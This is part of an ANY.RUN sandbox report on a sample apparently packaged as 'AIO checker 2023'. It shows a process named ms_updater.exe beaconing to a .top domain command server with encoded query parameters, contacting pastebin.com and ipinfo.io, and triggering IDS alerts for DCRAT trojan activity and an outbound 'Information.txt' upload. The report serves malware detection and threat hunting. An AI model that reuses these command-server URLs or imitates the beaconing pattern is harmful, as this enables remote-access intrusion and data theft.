http://714745cm.nyashland.top/nyashsupport.php?rUbsWv7Y618s5qvpc33nBh=haoF8OWMw1&lbJmoj5HV=ccePMxoL1PnJD3Rrp8KjoM0qFT&0PUr4LdF8J0warB4m=bYPU6366wJPlxK2Qy5g&8a43ab91d2d0ada45cd5ce27b80065c2=QNxczMhhTMwADM2AzNyMDM3YjZlRmM4kjZ4AjZkRTNhZDNmFTM5gTM2MTMyMTNzkDNyATM2ATN&024ace78b46de9dec7d33cd74bf374d2=QMxkjNmNWZ2YjMyMzN4Y2N0cTZzUzMjRzY0MmZzMjY5YGZiFGM4QTY&4b3611644f70fc2d5fba382ed48274b0=0VfiIiOiYmZ3UmM5EDN3kzM4UTZzYzN2IWO2ImMxUWMyImY2MzNiwiI0YGO5gjMmZGMjZjYyYmNmFTYhBTOkBjZkNzNhhjYyM2Y1MWMjdzM3IiOiATM2QzY4UmNkhzM5EWN0IGZ0IGNhRjN2Q2YmJzN3QTZiwiIyE2N2ImZ3MDMiVGO3QGZ1cjNiFjN0YGMyUWO3EWM4kDOzQmYyETO5IiOiUTN0EGM4cTN2UTM3YDZklTZjhTMhVmNwYjN3ADO0gTOis3W
unknown
text
104 b
unknown
240
ms_updater.exe
GET
200
172.67.129.42:80
http://714745cm.nyashland.top/nyashsupport.php?rUbsWv7Y618s5qvpc33nBh=haoF8OWMw1&lbJmoj5HV=ccePMxoL1PnJD3Rrp8KjoM0qFT&0PUr4LdF8J0warB4m=bYPU6366wJPlxK2Qy5g&8a43ab91d2d0ada45cd5ce27b80065c2=QNxczMhhTMwADM2AzNyMDM3YjZlRmM4kjZ4AjZkRTNhZDNmFTM5gTM2MTMyMTNzkDNyATM2ATN&024ace78b46de9dec7d33cd74bf374d2=QMxkjNmNWZ2YjMyMzN4Y2N0cTZzUzMjRzY0MmZzMjY5YGZiFGM4QTY&9d68fd20db10d46579acac1fdc533db7=d1nIPBHRkxGeHJGakZUS2JFSjVjSzE1ZNhVWJBXUE9EcERGb4dkYoRmRJxmTYlVa1cVY25UbD5ENr9EMWdkYzZkMWdWUYplbShVYpBXUE9EcERGb4dkYoRmRJRDdyI2SwcGV2EFWaNHeXlFWCNEZ6ZlbjBDcRR0TwREZsh3RihGZGlkeWhkW2hGWatEMnRlNRhlWzh3VZhlQTFmdKNjYaBXUE9EcERGb4dkYoRmRJlmVyY1Z0ADVVBXUE9EcERGb4dkYoRmRJRXOHRWdGdUYRBXUE9EcERGb4dkYoRmRJlmVyY1ZVJTW1ZUbiBnSrNkT0s2TwY1RiNnRyY1Z0cVY1lTbVtEMnRlNRhlWzh3VZhlQ5FWdsdEV1lTbjVFcRR0TwREZsh3RihGZGlkcOhVWOZ0RkxWMrNkT0s2TwY1RiNnRyY1ZnJzYo5UbXtEMnRlNRhlWzh3VZhlQ5JWeW1mY2FzaD5ENr9EMWdkYzZkMWdWVtNmdOtmYwljMZxmUYFWTwFFRPBHRkxGeHJGakZUS6ZFSaZHaYJ1SwcGV2EFWaNHeXlFWCNlYxYVbjxGaHRmRwFFRPBHRkxGeHJGakZUS0ZlbjBjTXp1cWt2QORzaPBjVHJ2cGJjVnVVbjZnTFFmeGdkULBzZUZTUYp1c4dVWYJUaiBXOykFbShVZDBXUE9EcERGb4dkYoRmRJxmSzIGR1cVY250RkBnSrNkT0s2TwY1RiNnRyY1ZNdVY0lzRkJEcRR0TwREZsh3RihGZGlUNKNjY0pEWRtEMnRlNRhlWzh3VZhlQTpla1cVW1xWbRJiOiYmZ3UmM5EDN3kzM4UTZzYzN2IWO2ImMxUWMyImY2MzNiwiI0YGO5gjMmZGMjZjYyYmNmFTYhBTOkBjZkNzNhhjYyM2Y1MWMjdzM3IiOiATM2QzY4UmNkhzM5EWN0IGZ0IGNhRjN2Q2YmJzN3QTZiwiIyE2N2ImZ3MDMiVGO3QGZ1cjNiFjN0YGMyUWO3EWM4kDOzQmYyETO5IiOiUTN0EGM4cTN2UTM3YDZklTZjhTMhVmNwYjN3ADO0gTOis3W
unknown
text
104 b
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2588
svchost.exe
239.255.255.250:1900
whitelisted
4
System
192.168.100.255:138
whitelisted
4
System
192.168.100.255:137
whitelisted
1080
svchost.exe
224.0.0.252:5355
unknown
240
ms_updater.exe
172.67.34.170:443
pastebin.com
CLOUDFLARENET
US
unknown
240
ms_updater.exe
172.67.129.42:80
714745cm.nyashland.top
CLOUDFLARENET
US
unknown
240
ms_updater.exe
34.117.186.192:443
ipinfo.io
GOOGLE-CLOUD-PLATFORM
US
unknown
240
ms_updater.exe
95.101.54.195:80
ctldl.windowsupdate.com
Akamai International B.V.
DE
unknown

DNS requests

Domain
IP
Reputation
pastebin.com
  • 172.67.34.170
  • 104.20.67.143
  • 104.20.68.143
shared
714745cm.nyashland.top
  • 172.67.129.42
  • 104.21.1.107
unknown
ipinfo.io
  • 34.117.186.192
shared
ctldl.windowsupdate.com
  • 95.101.54.195
  • 95.101.54.121
  • 95.101.54.136
  • 95.101.54.113
  • 95.101.54.105
whitelisted

Threats

PID
Process
Class
Message
1080
svchost.exe
Potentially Bad Traffic
ET DNS Query to a *.top domain - Likely Hostile
240
ms_updater.exe
A Network Trojan was detected
ET MALWARE DCRAT Activity (GET)
240
ms_updater.exe
Potentially Bad Traffic
ET INFO HTTP Request to a *.top domain
240
ms_updater.exe
Device Retrieving External IP Address Detected
ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)
240
ms_updater.exe
Device Retrieving External IP Address Detected
ET POLICY Possible External IP Lookup SSL Cert Observed (ipinfo.io)
240
ms_updater.exe
A Network Trojan was detected
ET HUNTING Observed Malicious Filename in Outbound POST Request (Information.txt)
1 ETPRO signatures available at the full report
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
AIO checker 2023 (2).rar